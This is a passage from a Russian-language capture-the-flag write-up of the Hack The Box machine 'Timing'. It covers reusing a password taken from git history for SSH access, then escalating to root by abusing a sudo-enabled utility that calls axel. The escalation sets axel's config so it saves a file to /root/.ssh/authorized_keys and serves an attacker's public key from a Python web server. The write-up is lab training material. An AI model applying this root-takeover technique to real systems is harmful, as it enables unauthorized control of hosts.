    &lt;img src=&quot;https://img2.teletype.in/files/1e/37/1e374fa3-1c36-440d-bffc-07d9f7eb2dc2.png&quot; /&gt;
    &lt;figcaption&gt;Со­дер­жимое архи­ва&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;NNHD&quot;&gt;Для удоб­ной работы с репози­тори­ями Git мож­но исполь­зовать гра­фичес­кий прос­мот­рщик gitk. Он помог най­ти изме­нение пароля для под­клю­чения к базе дан­ных.&lt;/p&gt;
  &lt;figure id=&quot;UMi7&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9a/58/9a58e083-35ab-42a7-ab97-4ffc62d57b64.png&quot; /&gt;
    &lt;figcaption&gt;Из­менение в фай­ле db_conn.php&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;zKmT&quot;&gt;А вот уже с этим паролем уда­ется под­клю­чить­ся по SSH и заб­рать пер­вый флаг.&lt;/p&gt;
  &lt;figure id=&quot;09vG&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b6/6a/b66ae12e-410b-421a-a660-4fed52888c0e.png&quot; /&gt;
    &lt;figcaption&gt;Флаг поль­зовате­ля&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;hTL6&quot;&gt;Локальное повышение привилегий&lt;/p&gt;
  &lt;p id=&quot;u9rF&quot;&gt;Пер­вым делом про­веря­ем наибо­лее веро­ятные мес­та повыше­ния при­виле­гий: нас­трой­ки sudoers, при­ложе­ния с выс­тавлен­ным битом SUID, прос­лушива­емые на локал­хосте пор­ты. Про­верим sudoers коман­дой sudo -l.&lt;/p&gt;
  &lt;figure id=&quot;qNWf&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9f/5a/9f5a7bb8-baf3-47e5-aee0-5066cabbdfe5.png&quot; /&gt;
    &lt;figcaption&gt;Нас­трой­ки судо­ера&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;0150&quot;&gt;В нас­трой­ках про­писан при­виле­гиро­ван­ный запуск &lt;strong&gt;/usr/bin/netutils&lt;/strong&gt; без вво­да пароля (NOPASSWD). Прос­мотрим тип фай­ла.&lt;/p&gt;
  &lt;figure id=&quot;NXUM&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d5/85/d58512d9-b0a8-4728-927d-961ed4bdec7f.png&quot; /&gt;
    &lt;figcaption&gt;Оп­ределе­ние типа фай­ла /usr/bin/netutils&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;DqsS&quot;&gt;Это обыч­ный скрипт. Давай гля­нем на его содер­жимое.&lt;/p&gt;
  &lt;figure id=&quot;jHSj&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/1a/90/1a904ba6-5717-4959-8345-408856814ae6.png&quot; /&gt;
    &lt;figcaption&gt;Со­дер­жимое фай­ла /usr/bin/netutils&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;N5NV&quot;&gt;Это поль­зователь­ское при­ложе­ние на Java. Но так как оно рас­положе­но в катало­ге рута, мы не можем получить дос­туп к самому фай­лу и деком­пилиро­вать его, что­бы изу­чить. Тог­да давай хотя бы запус­тим прог­рамму и пос­мотрим, как она работа­ет.&lt;/p&gt;
  &lt;figure id=&quot;Y5BA&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2a/c4/2ac4d240-b02a-465a-acf2-238a106b121f.png&quot; /&gt;
    &lt;figcaption&gt;Ме­ню при­ложе­ния&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;1H1z&quot;&gt;Нам пред­лага­ют выб­рать одну из опций: FTP или HTTP. Пос­ле чего с ука­зан­ного ресур­са заг­ружа­ется файл.&lt;/p&gt;
  &lt;figure id=&quot;lWNJ&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7f/f3/7ff3673d-1002-4b48-9ad0-868f87f87dda.png&quot; /&gt;
    &lt;figcaption&gt;Со­обще­ние о заг­рузке фай­ла&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;fQHr&quot;&gt;Пос­мотрим, что про­исхо­дит с про­цес­сами в сис­теме при выпол­нении это­го при­ложе­ния. Для отсле­жива­ния про­цес­сов будем исполь­зовать &lt;a href=&quot;https://github.com/DominicBreuker/pspy&quot; target=&quot;_blank&quot;&gt;pspy64&lt;/a&gt;. Заг­рузим его на хост:&lt;/p&gt;
  &lt;p id=&quot;Lik8&quot;&gt;1scp ./pspy64 aaron@timing.htb:/tmp/&lt;/p&gt;
  &lt;p id=&quot;2iRZ&quot;&gt;И выпол­ним. В выводе видим запуск скрип­та, но, что более инте­рес­но, пос­ле ука­зания адре­са для заг­рузки исполь­зует­ся прог­рамма axel в кон­тек­сте поль­зовате­ля с UID=0, а это поль­зователь root.&lt;/p&gt;
  &lt;figure id=&quot;gAIf&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/43/89/438986e7-5350-4755-95e6-6b6266b01b91.png&quot; /&gt;
    &lt;figcaption&gt;Ло­ги pspy&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;OBlk&quot;&gt;Я сра­зу поп­робовал выпол­нить инъ­екцию коман­ды ОС, но это ничего не дало.&lt;/p&gt;
  &lt;figure id=&quot;ZZlM&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7f/a8/7fa87ce7-d337-4fe0-b97c-7a429b52b745.png&quot; /&gt;
    &lt;figcaption&gt;Тес­тирова­ние OS Command Injection&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;iI3j&quot;&gt;Од­нако мы можем кон­фигури­ровать axel и управлять некото­рыми его парамет­рами, к при­меру име­нем фай­ла и катало­гом для его сох­ранения. Недол­го раз­мышляя, про­буем сох­ранить файл как пуб­личный SSH-ключ поль­зовате­ля root. Для это­го в домаш­нем катало­ге текуще­го поль­зовате­ля сох­раним файл .axelrc со сле­дующим содер­жимым:&lt;/p&gt;
  &lt;p id=&quot;Co2r&quot;&gt;1default_filename = /root/.ssh/authorized_keys&lt;/p&gt;
  &lt;figure id=&quot;yKwh&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/01/df/01dfc76d-858a-41d9-b5b3-18e4ffb72e77.png&quot; /&gt;
    &lt;figcaption&gt;Файл кон­фигура­ций axel&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;SZza&quot;&gt;На локаль­ном хос­те сге­нери­руем пару клю­чей (ssh-keygen) и пере­име­нуем пуб­личный, что­бы он называл­ся index.html. Запус­тим прос­той веб‑сер­вер на Python:&lt;/p&gt;
  &lt;p id=&quot;DdY8&quot;&gt;1python3 -m http.server 80&lt;/p&gt;
  &lt;p id=&quot;2YQK&quot;&gt;А затем обра­тим­ся к нему из тес­тиру­емо­го при­ложе­ния.&lt;/p&gt;
  &lt;figure id=&quot;80U0&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b9/96/b996fa28-b21a-403b-adaf-d89f4c644850.png&quot; /&gt;
    &lt;figcaption&gt;За­пись SSH-клю­ча&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ACPm&quot;&gt;Ви­дим сооб­щение с име­нем сох­ранен­ного фай­ла, про­буем под­клю­чить­ся с зак­рытым клю­чом и получа­ем кон­троль над хос­том.&lt;/p&gt;
  &lt;figure id=&quot;NZcE&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/06/50/06507d0b-8a0c-404b-affd-72c403892f8e.png&quot; /&gt;
    &lt;figcaption&gt;Взлом веб-сервера на PHP. Флаг рута&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nsrV&quot;&gt;Ма­шина зах­вачена, и у нас есть флаг рута.&lt;/p&gt;
  &lt;p id=&quot;C87P&quot;&gt;&lt;strong&gt;Заключение&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;2uUe&quot;&gt;Се­год­ня мы с вами прошли путь от обычного ска­ниро­вания сай­та до экс­плу­ата­ции уяз­вимос­ти типа LFI и заг­рузки шел­ла. Надеюсь вам понравился наше увлекательное приключение Timing с пло­щад­ки Hack The Box.&lt;/p&gt;
  &lt;p id=&quot;zxPn&quot;&gt;&lt;strong&gt;Полезные ссылки:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;DM3W&quot;&gt;
    &lt;li id=&quot;PA0F&quot;&gt;&lt;a href=&quot;https://spy-soft.net/django-website-hack/&quot; target=&quot;_blank&quot;&gt;Взлом сайта на Django&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;8fji&quot;&gt;&lt;a href=&quot;https://spy-soft.net/hack-nginx/&quot; target=&quot;_blank&quot;&gt;Взлом nginx с помощью уяз­вимости в скрип­те&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;J4uE&quot;&gt;&lt;a href=&quot;https://spy-soft.net/hacking-web-server-via-ssrf/&quot; target=&quot;_blank&quot;&gt;Взлом веб-сервера на Windows и Apache через SSRF&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;StjF&quot;&gt;&lt;a href=&quot;https://spy-soft.net/hacking-web-server-php/&quot; target=&quot;_blank&quot;&gt;Источник&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;ueE9&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;uqsh&quot;&gt;&lt;strong&gt;Наши проекты:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;UVdc&quot;&gt;- Кибер новости: &lt;a href=&quot;https://t.me/matrixleaks&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;the Matrix&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Хакинг: &lt;a href=&quot;https://t.me/+bby6PJAbqpNhOWZh&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;/me Hacker&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Кодинг: &lt;a href=&quot;https://t.me/+zBgEm0olmpxlMzA6&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Minor Code&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

</content></entry></feed>